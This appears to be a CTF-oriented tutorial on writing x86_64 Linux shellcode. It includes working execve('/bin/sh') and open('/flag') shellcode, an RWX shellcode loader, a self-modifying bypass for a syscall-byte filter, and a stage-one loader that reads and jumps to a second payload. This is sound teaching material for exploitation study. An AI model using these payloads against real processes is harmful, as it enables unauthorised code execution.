I trust that whoever is reading this article is not a layman: you are probably familiar with CTFs, have overflowed a buffer and smashed the stack at least once, and know what you are getting yourself into. I assume you know what a CTF challenge is, the basics of x86 assembly, and how to use Linux.

The term “shellcode” comes from the usual objective of an exploit: executing a command shell such as /bin/sh. The code is written in assembly language.

# execve("/bin/sh", {NULL}, {NULL})
.intel_syntax noprefix
.text
.global _start
_start:
    mov rax, 0x68732f6e69622f
    push rax
    push rsp
    pop rdi
    xor eax, eax
    push rax
    mov al, 59
    push rsp
    pop rdx
    push rsp
    pop rsi
    syscall

Looking at this code for the first time is intimidating. But once you learn how to read it, writing the shellcode becomes the easiest part of the job.

How does it execute

Shellcode is simply executable bytes: machine instructions assembled to perform a small task once control flow has been hijacked.

Computers follow one of two broad designs: Von Neumann architectures, which store code and data in the same memory and treat code as data, and Harvard architectures, which store code and data separately.

Almost all general-purpose architectures (x86, ARM, MIPS, etc.) are Von Neumann, and they are the focus of this article.

Starting out, we will use a simple shellcode loader to test and execute our shellcode.

#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h> // for read()
 
int main(void) {
    // 1. Allocate an executable memory page.
    //    PROT_READ | PROT_WRITE | PROT_EXEC: The memory can be read, written to, and executed.
    //    MAP_PRIVATE | MAP_ANON: The mapping is private to this process and not backed by a file.
    void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);
 
    if (page == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }
 
    printf("[+] Memory allocated at: %p\n", page);
 
    // 2. Read shellcode from standard input (stdin) into the allocated page.
    printf("[+] Reading shellcode from stdin...\n");
    ssize_t bytes_read = read(STDIN_FILENO, page, 4095);
 
    if (bytes_read <= 0) {
        perror("read failed or no input provided");
        return 1;
    }
 
    printf("[+] Read %zd bytes. Executing now...\n", bytes_read);
 
    // 3. Create a function pointer to the page and call it.
    //    This transfers execution to the shellcode.
    void (*shellcode_func)(void) = (void (*)(void))page;
    shellcode_func();
 
    // This line will likely not be reached if the shellcode exits.
    return 0;
}

Shellcode is just bytes. If you want to execute it, those bytes must live in memory marked as executable.

The mmap call is important. If we requested memory without PROT_EXEC, then the moment the program tried to execute the code at page, the CPU’s memory management unit would see the “No-Execute” permission on that page and trigger a protection fault, resulting in a SIGSEGV.

We are asking for a single page (0x1000 bytes) of memory that is:

  1. Writable: we load shellcode bytes into it using read.
  2. Executable: the CPU will happily jmp into it without complaining.

void *page = mmap(
    NULL,                // Let the kernel choose the address
    4096,                // One page = 4096 bytes (common page size)
    PROT_READ | PROT_WRITE | PROT_EXEC, // Permissions: read, write, execute
    MAP_PRIVATE | MAP_ANON, // Private mapping, not backed by a file
    -1,                  // File descriptor (-1 since it's anonymous)
    0                    // Offset (not used here)
);

The program is not compiled with the default gcc configuration. Modern toolchains enable protections against shellcode by default (stack canaries, a non-executable stack, PIE), and you need to disable them when compiling the program.

gcc -ggdb -g3 execute.c -fno-stack-protector -z execstack -no-pie -fno-pie -o execute

Using checksec, we see Stack: Executable. That means data on the stack can be executed as code.

$ pwn checksec --file=execute
[*] '/tmp/test/execute'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes

Writing Shellcode

Before I start writing shellcode, I open a lot of documentation: syscall tables and the manual for whatever architecture I am targeting. To mention a few, I use Systrack: Linux kernel syscall tables for syscall lookups, and Félix Cloutier’s x86 and amd64 instruction reference, which is easier to navigate, though the official Intel manual also works.

When writing shellcode, your goal is to execute syscalls (system calls). They are the special functions your program uses to talk to the kernel.

  • read to ask the kernel to read from a file.
  • write to ask the kernel to write to a file.
  • execve to ask the kernel to run another program.
  • exit to tell the kernel you’re done and exit cleanly.

Syscalls are functions and, like any other function, they take parameters. It is not as easy as function(arg1, arg2, arg3), but you learn to do it.

Syscall calling convention for the x86 and x86_64 architectures (the syscall number goes in eax/rax, which also receives the return value):

ARCH  RETURN  ARG0  ARG1  ARG2  ARG3  ARG4  ARG5
x86   eax     ebx   ecx   edx   esi   edi   ebp
x64   rax     rdi   rsi   rdx   r10   r8    r9
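
As a rough illustration of the x64 row in the table above, the sketch below generates the register setup for a syscall. The helper name emit_syscall and its output format are made up for this article; it only handles integer arguments and uses plain mov, which is not the shortest encoding.

```python
# Hypothetical helper: turn a syscall number and integer arguments into
# Intel-syntax assembly following the x86_64 Linux syscall convention.
X64_ARG_REGS = ["rdi", "rsi", "rdx", "r10", "r8", "r9"]


def emit_syscall(number, args=()):
    """Return assembly lines that load rax and the argument registers."""
    if len(args) > len(X64_ARG_REGS):
        raise ValueError("a syscall takes at most 6 arguments")
    lines = [f"mov rax, {number}"]            # syscall number goes in rax
    for reg, value in zip(X64_ARG_REGS, args):
        lines.append(f"mov {reg}, {value}")   # arguments in table order
    lines.append("syscall")
    return lines


if __name__ == "__main__":
    # exit(0): syscall number 60 on x86_64, one argument
    print("\n".join(emit_syscall(60, [0])))
```

Calling emit_syscall(0, [0, "rsp", 100]) would produce the setup for a read from stdin into the stack, with the buffer passed as a register name.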

To make a syscall, you look up its number. The simplest example is the exit() syscall; looking it up in a man page, you find this definition:

exit - cause normal process termination

#include <stdlib.h>

[[noreturn]] void exit(int status);

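It takes only one parameter, the exit status. On Unix-like systems, a successful exit is exit(0), so let’s write that in shellcode. Never mind the first three lines (the directives and the _start label); they matter to the assembler, not to us in this case. Note that the snippet never sets rdi, the status argument: run as a standalone program, it relies on the kernel zeroing the registers at process start. Inside a hijacked process, clear it explicitly, for example with xor edi, edi.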

.intel_syntax noprefix
 
.global _start
 
_start:
    mov rax, 60      # syscall number for exit
    syscall          # invoke the syscall

Assemble the shellcode using the following.

gcc -nostdlib -static hello.S -o hello.elf

This creates an ELF file. Inspect it with objdump to see the disassembly.

$ objdump -d -Mintel hello.elf

hello.elf:     file format elf64-x86-64


Disassembly of section .text:

0000000000401000 <_start>:
  401000:   48 c7 c0 3c 00 00 00   mov    rax,0x3c
  401007:   0f 05                  syscall

We only want the .text section of the ELF file. To extract it, use objcopy.

objcopy --dump-section .text=hello.bin hello.elf

Use xxd to view the raw bytes.

$ xxd hello.bin
00000000: 48c7 c03c 0000 000f 05                   H..<.....
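
To paste the bytes into an exploit script, they are often written as an escaped string. A small sketch, assuming the nine bytes shown in the objdump listing above; the name to_escaped is invented here.

```python
# The nine bytes of the exit example, copied from the objdump listing.
SHELLCODE = bytes.fromhex("48c7c03c0000000f05")


def to_escaped(code):
    """Render raw bytes as a \\xNN escaped string."""
    return "".join(f"\\x{b:02x}" for b in code)


if __name__ == "__main__":
    print(len(SHELLCODE), "bytes")
    print(to_escaped(SHELLCODE))
```

In practice you would read hello.bin from disk instead of hard-coding the hex string.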

You can run the ELF file just like any other Linux program. It exits with status 0; to check the status, run echo $?.

./hello.elf
echo $?
# 0

For more detail, use strace to watch the syscalls being executed.

strace ./hello.elf
# execve("./hello.elf", ["./hello.elf"], 0x7ffe3fbd8560 /* 73 vars */) = 0
# exit(0)                                 = ?
# +++ exited with 0 +++

Enough with the long introduction; let’s get into the notes.

Problems you would run into when writing shellcode

Here are some of the common problems that you will run into eventually when you are writing shellcode.

Size constraints (Byte budget hell)

Your goal is to use as few bytes as possible.

XOR Instruction

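Be careful about overusing mov. To zero out a register, do not use mov; use xor instead. On x86_64, xor eax, eax also clears the upper half of rax, because writing a 32-bit register zero-extends into the full 64-bit register.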

mov    al,0x0       ; b0 00
mov    ax,0x0       ; 66 b8 00 00
mov    eax,0x0      ; b8 00 00 00 00
mov    rax,0x0      ; 48 c7 c0 00 00 00 00
 
xor    al,al        ; 30 c0
xor    ax,ax        ; 66 31 c0
xor    eax,eax      ; 31 c0
xor    rax,rax      ; 48 31 c0
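
The listing above can be checked mechanically. The sketch below takes the encodings exactly as listed and reports each one's size and whether it contains a null byte; the function name describe is an assumption of this example.

```python
# Encodings copied from the listing above (instruction -> machine code).
ENCODINGS = {
    "mov al, 0": "b0 00",
    "mov ax, 0": "66 b8 00 00",
    "mov eax, 0": "b8 00 00 00 00",
    "mov rax, 0": "48 c7 c0 00 00 00 00",
    "xor al, al": "30 c0",
    "xor ax, ax": "66 31 c0",
    "xor eax, eax": "31 c0",
    "xor rax, rax": "48 31 c0",
}


def describe(hex_bytes):
    """Return (size in bytes, True if the encoding contains a 0x00 byte)."""
    code = bytes.fromhex(hex_bytes)
    return len(code), 0 in code


if __name__ == "__main__":
    for insn, enc in ENCODINGS.items():
        size, has_null = describe(enc)
        print(f"{insn:<14} {size} bytes, null byte: {has_null}")
```

Every mov variant carries its zero immediate as literal 0x00 bytes, while the xor variants carry none.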

Push Pop

Push a value onto the stack and pop it back into a register; the pair can be shorter than the equivalent 64-bit mov.

;; 7 bytes
mov rax, 0xbadc0de      ; 48 c7 c0 de c0 ad 0b
 
;; 6 bytes
push   0xbadc0de        ; 68 de c0 ad 0b
pop    rax              ; 58
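
One caveat with this trick: in 64-bit mode, push with a 32-bit immediate sign-extends the value to 64 bits. The sketch below checks whether a given constant survives that extension; both function names are made up for illustration.

```python
def sign_extend_32(value):
    """Sign-extend the low 32 bits of value to a 64-bit unsigned integer."""
    low = value & 0xFFFFFFFF
    if low & 0x80000000:
        return low | 0xFFFFFFFF00000000
    return low


def push_pop_loads(value):
    """True if `push value; pop reg` leaves exactly `value` in the register."""
    return sign_extend_32(value) == (value & 0xFFFFFFFFFFFFFFFF)


if __name__ == "__main__":
    for v in (0x0BADC0DE, 0xDEADBEEF, 0x68732F6E69622F):
        print(hex(v), push_pop_loads(v))
```

Values with bit 31 set, or wider than 32 bits, need a different approach such as a 64-bit mov or the shifting trick.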

Use what you have

When you hijack the control flow (e.g. via jmp rax), the registers may already hold useful values. For example, if you need the read syscall and rdx already holds a non-zero value, use it as-is for the count parameter. It is situation dependent, but you get the point.

Strings

If you think strings are hard in C, well let me introduce you to x86_64.

I will use open syscall as an example.

# open("/flag", O_RDONLY)
mov rbx, 0x67616c662f           # rbx = "/flag" (little endian, zero padded)
push rbx                        # place the string on the stack
mov rax, 2                      # open() syscall
mov rdi, rsp                    # point to first item on stack ("/flag")
mov rsi, 0                      # second arg: flags = O_RDONLY (0)
syscall                         # open("/flag", O_RDONLY)

The value 0x67616c662f is /flag in little endian. To reproduce it, run the following command.

echo -ne "/flag" | rev | xxd -p
# 67616c662f
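
The same conversion can be done in Python, which is handy inside an exploit script. A minimal sketch, assuming the string is at most 7 bytes so the top byte of the register stays zero and terminates it; to_immediate is a hypothetical name.

```python
def to_immediate(text):
    """Return the little-endian immediate that spells `text` in memory."""
    data = text.encode()
    if len(data) > 7:
        raise ValueError("need at most 7 bytes to keep a terminating zero")
    return hex(int.from_bytes(data, "little"))


if __name__ == "__main__":
    print(to_immediate("/flag"))
    print(to_immediate("/bin/sh"))
```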

The downside is that you will struggle with long strings, as they may not fit in a register. Another way is to use labels. I prefer this way, but it may not always work.

# open("/flag", O_RDONLY)
push 2
pop rax             # open syscall = 2
 
lea rdi, [rip+flag]     # flag string
xor rsi, rsi        # O_RDONLY = 0
 
syscall
 
flag:
  .string "/flag"

You can also build the string on the stack. This almost always works, but it takes a lot of work.

# open("/flag", O_RDONLY)
# push "flag" little endian to stack
push 0x67616C66
pop  rax                        # rax = 0x0000000067616C66
 
# shift left 8 bits to make room for the '/' byte
shl  rax, 8                     # rax = 0x00000067616C6600
# load '/' (0x2F) into rbx using push/pop
push 0x2F
pop  rbx                        # rbx = 0x...0000002F
 
# OR the '/' into the low byte
or   rax, rbx                   # rax = 0x00000067616C662F
# push the 64-bit qword (stack gets "/flag\0\0\0" in little-endian)
push rax
 
push 2                          # open syscall
pop rax
 
lea rdi, [rsp]                  # filename = "/flag"
xor rsi, rsi                    # flags = O_RDONLY
 
syscall
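
For strings longer than one register, the stack approach generalises: split the string into 8-byte chunks and push them last chunk first. The generator below is only a sketch with an invented name (push_string); it ignores null-byte filtering, so the immediates it emits may contain zero bytes.

```python
def push_string(text):
    """Return assembly lines that leave `text` (NUL-terminated) at rsp."""
    data = text.encode() + b"\x00"              # explicit terminator
    data += b"\x00" * (-len(data) % 8)          # pad to a multiple of 8
    chunks = [data[i:i + 8] for i in range(0, len(data), 8)]
    lines = []
    for chunk in reversed(chunks):              # last chunk is pushed first
        imm = int.from_bytes(chunk, "little")
        lines.append(f"mov rax, {imm:#018x}")
        lines.append("push rax")
    return lines


if __name__ == "__main__":
    print("\n".join(push_string("/etc/passwd")))
```

After the generated pushes, rsp points at the start of the string, so it can be used directly as the filename argument.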

Input filtering

Input may be manipulated or have some bytes filtered out before execution.

String termination & null bytes

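If the vulnerable program copies your input with string functions such as strcpy, a 0x00 byte ends the copy and truncates the shellcode. One great resource I found is nets.ec/Shellcode/Null-free, which has many great examples.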

  1. Use xor instruction instead of mov

This uses fewer bytes and does not include null bytes.

# bad
mov rax, 0
 
# good
xor rax, rax

  2. Use push and pop instructions instead of mov

push 0x70
pop rax
syscall

  3. Use shifting instructions

mov     rdi, 0x68732f6e69622f6a   # load "j/bin/sh" as a 64-bit immediate; the 'j' is a filler byte, so there are no null bytes
shr     rdi, 8                    # shift out the filler; the top byte becomes 0x00 and terminates the string
push    rdi                       # push the qword: the stack now holds "/bin/sh\0"
push    rsp                       # push current RSP (stack pointer)
pop     rdi                       # pop it into RDI -> RDI points at the pushed string
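
The shift trick above is easy to verify with plain integer arithmetic. This sketch checks that the immediate contains no zero byte before the shift and spells "/bin/sh\0" after it; the names FILLER_IMM and has_null are assumptions of the example.

```python
FILLER_IMM = 0x68732F6E69622F6A   # "j/bin/sh" in memory order


def has_null(value, width=8):
    """True if the little-endian encoding of value contains a 0x00 byte."""
    return 0 in value.to_bytes(width, "little")


# What `shr rdi, 8` computes: the filler byte falls off the low end.
SHIFTED = FILLER_IMM >> 8

if __name__ == "__main__":
    print(has_null(FILLER_IMM))
    print(SHIFTED.to_bytes(8, "little"))
```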

Self modifying shellcode

Once, I was solving a CTF challenge that filtered the syscall bytes 0F 05. I wrote shellcode that constructs the syscall bytes 0F 05 at runtime so they are not present when the filter runs. The following code increments the 0E by 1 so it becomes 0F, which bypasses the filter. This only works when the shellcode sits in writable memory.

inc BYTE PTR [rip]
.byte 0x0e, 0x05
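
To see why this passes the filter, the patch can be simulated on the raw bytes. The sketch assumes inc BYTE PTR [rip] assembles to fe 05 followed by a zero 32-bit displacement (six bytes), so the target is the byte right after the instruction; run_patch is a made-up name and nothing here executes machine code.

```python
SYSCALL = b"\x0f\x05"

# Assumed encoding of `inc BYTE PTR [rip]` followed by the placeholder 0e 05.
STAGE = bytes.fromhex("fe0500000000" "0e05")


def run_patch(code):
    """Simulate the inc: add 1 to the byte right after the 6-byte instruction."""
    patched = bytearray(code)
    target = 6                      # rip-relative, displacement 0 -> next byte
    patched[target] = (patched[target] + 1) & 0xFF
    return bytes(patched)


if __name__ == "__main__":
    print(SYSCALL in STAGE)             # what the filter sees
    print(SYSCALL in run_patch(STAGE))  # what the CPU executes
```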

NOP Padding

nop is an instruction that does nothing. It is useful for padding, alignment, or similar purposes.

.global _start
 
_start:
    # Your code here
    nop
    nop
    #...
    nop
 
    .fill 10, 1, 0x90    # 10 NOP instructions
    # or
    .rept 10
        nop
    .endr
 
    # More code here

Multi stage shellcode

Sometimes the input filtering makes it impossible to write shellcode that does anything meaningful. One way to solve this problem is multi-stage shellcode: write a stage 1 “loader” whose only job is to load another shellcode. Only stage 1 passes through the filter.

push 0
push 0
pop rax         # read syscall
pop rdi         # stdin
 
push rsp
pop rsi         # rsi = rsp (buffer)
 
push 100
pop rdx
 
syscall
 
jmp rsp
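
Before sending a loader like the one above, it helps to test it against the filter offline. The bytes below are my hand assembly of that loader and should be double-checked with an assembler; the banned sets are hypothetical filters, and rejected_bytes is a name invented for this sketch.

```python
# Hand-assembled stage 1 (assumption, verify with your assembler):
# push 0; push 0; pop rax; pop rdi; push rsp; pop rsi;
# push 100; pop rdx; syscall; jmp rsp
STAGE1 = bytes.fromhex("6a006a00585f545e6a645a0f05ffe4")


def rejected_bytes(code, banned):
    """Return the sorted banned byte values that occur in code."""
    return sorted(set(code) & set(banned))


if __name__ == "__main__":
    print(len(STAGE1), "bytes")
    print(rejected_bytes(STAGE1, {0x48}))   # hypothetical filter: no REX.W prefix
    print(rejected_bytes(STAGE1, {0x00}))   # hypothetical filter: no null bytes
```

The push/pop style keeps the loader free of the 0x48 prefix, but push 0 still introduces null bytes, so the loader has to be adapted to whatever the actual filter rejects.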

Use Pwntools when possible

It has lots of functions that automate and ease the process of writing shellcode. Sometimes you don’t need to write shellcode at all; it does it for you. But first you have to understand how the magic works, otherwise you will waste a lot of time. RTFM.

Pwn shellcraft

pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name
pwn shellcraft -f hex amd64.linux.sh #Print the shellcode as a hex string
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell

Pwn template

I like to use the pwn template command to generate a starting point for my challenges.

Then use the asm("") function to write the shellcode instead of assembling it and passing it by hand through the shell.

stage1 = asm("""# shellcode loader""")
stage2 = asm("""# actual shellcode""")
 
io.sendline(stage1)
pause(1)
io.sendline(stage2)
 
io.interactive()

GDB Debugger

Using a debugger is essential. gdb is good but lacks features, which is why I recommend using pwndbg or gef with it. They help with visualisation and provide functions that are useful for debugging.

gdbscript = f'''
 
# break points
#...
 
source /opt/gef/gef.py
continue
'''

References